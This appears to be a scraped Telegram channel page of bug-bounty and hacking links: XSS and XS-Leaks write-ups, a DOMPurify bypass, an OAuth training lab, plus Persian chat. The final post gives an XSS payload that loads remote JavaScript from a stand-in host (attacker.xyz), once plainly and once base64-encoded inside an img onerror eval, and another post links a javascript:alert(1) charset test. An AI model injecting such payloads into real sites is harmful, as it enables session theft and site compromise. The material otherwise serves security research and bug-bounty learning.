BugBounty & Hacking Resources – Telegram
BugBounty & Hacking Resources
@projectzeroTM
1.18K subscribers
22 photos
2 videos
5 files
363 links
Download Telegram
About
Blog
Apps
Platform
Join
BugBounty & Hacking Resources
1.18K subscribers
BugBounty & Hacking Resources
🔗https://ndevtk.github.io/writeups/2024/08/01/awas

📲Android Chromium bugs

#android
Please open Telegram to view this post
VIEW IN TELEGRAM
Writeups
Android web attack surface
The following is a writeup for some Android specific chromium behaviors.
3
410 viewsMeydi
BugBounty & Hacking Resources
https://github.com/cyllective/oauth-labs
GitHub
GitHub - cyllective/oauth-labs: oauth-labs: an intentionally vulnerable set of OAuth 2.0 labs for security training and learning
oauth-labs: an intentionally vulnerable set of OAuth 2.0 labs for security training and learning - cyllective/oauth-labs
9
435 viewsW3NDGO, edited  
BugBounty & Hacking Resources
https://x.com/garethheyes/status/1864708902928908553
👍2🔥2
413 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://x.com/Rhynorater/status/1864706692874633555?t=dwlVSqhonfIc1j3S1YdMqw&s=19
3
347 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
Forwarded from Android Security & Malware
Malimite: iOS decompiler designed to analyze and decode IPA files
Built on top of Ghidra to offer direct support for Swift, Objective-C, and iOS resources
https://github.com/LaurieWired/Malimite
GitHub
GitHub - LaurieWired/Malimite: iOS and macOS Decompiler
iOS and macOS Decompiler. Contribute to LaurieWired/Malimite development by creating an account on GitHub.
3
360 viewsMeydi
BugBounty & Hacking Resources
https://jdomeracki.github.io//2024/11/09/sketchy_cheat_sheet/
Sunshine After Rain
Sketchy Cheat Sheet - Story of a Cloud Architecture Diagramming Tool gone wrong
Table of Contents
2
330 viewsMeydi
BugBounty & Hacking Resources
https://satoooon1024.hatenablog.com/entry/2024/12/02/XS-Leaks_through_Speculation-Rules_-_SECCON_CTF_13_Author%27s_Writeup_%28_Tanuki_Udon_%29
Satoooonの物置
XS-Leaks through Speculation-Rules - SECCON CTF 13 Author's Writeup ( Tanuki Udon ) - Satoooonの物置
JP (Translated by ChatGPT) In this article, I'll explain the intended solution for the "Tanuki Udon" challenge presented in SECCON CTF 13. TL;DR An XS-Leaks att…
2
395 viewsMeydi
BugBounty & Hacking Resources
BugBounty & Hacking Resources pinned Deleted message
BugBounty & Hacking Resources
https://x.com/Sonar_Research/status/1866135979880300830
2
397 viewsMeydi
BugBounty & Hacking Resources
https://infosecwriteups.com/cookie-jar-overflow-a-new-threat-to-httponly-cookies-in-xss-vulnerable-applications-9ceac4041082
Medium
Cookie Jar Overflow: A New Threat to HttpOnly Cookies in XSS Vulnerable Applications
Cross-Site Scripting (XSS) is often considered a beautiful attack due to its elegance and effectiveness in exploiting vulnerabilities…
🔥3👌2
477 viewsAbolFazl
BugBounty & Hacking Resources
BugBounty & Hacking Resources
https://x.com/Sonar_Research/status/1866135979880300830
https://yaniv-git.github.io/2024/12/08/DOMPurify%203.2.1%20Bypass%20(Non-Default%20Config)/
yaniv-git.github.io
DOMPurify 3.2.1 Bypass (Non-Default Config)
This blog post covers DOMPurify 3.2.1 Bypass, explaining a specific mutation technique
2
625 views
BugBounty & Hacking Resources
https://x.com/intigriti/status/1605217304052400128?s=46
🔥2
583 views
BugBounty & Hacking Resources
https://x.com/garethheyes/status/1871540782328352965?s=46
🔥42
431 viewsMeydi
BugBounty & Hacking Resources
BugBounty & Hacking Resources
https://x.com/garethheyes/status/1871540782328352965?s=46
این کاربردش کجاس(ff):
اگه تو هدر یا متا تگ charset تعریف ولی ست نشده باشه یا مقدارش اشتباه باشه

تو (chrome) به نظر باید حتما:
iso-2022-jp
باشه
🔥62👍1
483 viewsMeydi
BugBounty & Hacking Resources
BugBounty & Hacking Resources
این کاربردش کجاس(ff): اگه تو هدر یا متا تگ charset تعریف ولی ست نشده باشه یا مقدارش اشتباه باشه تو (chrome) به نظر باید حتما: iso-2022-jp باشه
برای کروم هم میشه(حتی اگرم charset نباشه یا الکی باشه):
https://portswigger-labs.net/xss/charset.php?x=%1B%1B%3Ca%20href=javas%1B(Jcript:alert(1)%3Etest%3C/a%3E&charset=
2🔥1
444 viewsMeydi
BugBounty & Hacking Resources
BugBounty & Hacking Resources
Photo
This media is not supported in your browser
VIEW IN TELEGRAM
479 viewsGabimaru
🤣10
BugBounty & Hacking Resources
👋
🤬6😢1
480 viewsMeydi
BugBounty & Hacking Resources
BugBounty & Hacking Resources
👋
This media is not supported in your browser
VIEW IN TELEGRAM
484 viewsᴍͥᴏᴇͣɪͫɴ
🤣6
BugBounty & Hacking Resources
BugBounty & Hacking Resources
👋
هر 1 روز در ایران == زوال عقل بیشتر
الانم که وضع vpn ها بدترم شده😩
بیشتر انرژیمون فقط سره connect بودنه
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
471 viewsMeydi, edited  
BugBounty & Hacking Resources
noscriptElement = document.createElement('noscript');
noscriptElement.src = 'https://attacker.xyz/path_to_file.js';
document.head.appendChild(noscriptElement);


اگه خواستید js رو از سایتتون لود کنید. برای شرایطی که کد اکسپلویت گنده بود.
و اینکه میتونید همینو base64 کنید که اذیت نشید. مثلا:
<img src=1 onerror="x=atob`c2NyaXB0RWxlbWVudCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHRFbGVtZW50LnNyYyA9ICdodHRwczovL2F0dGFja2VyLnh5ei9wYXRoX3RvX2ZpbGUuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdEVsZW1lbnQpOw`;eval(x)">


تو سورس پابلیک زیاد گفتنش, ولی خب اینجا میذارم چون کاربردیه
#xss
👍51
671 viewsMeydi, edited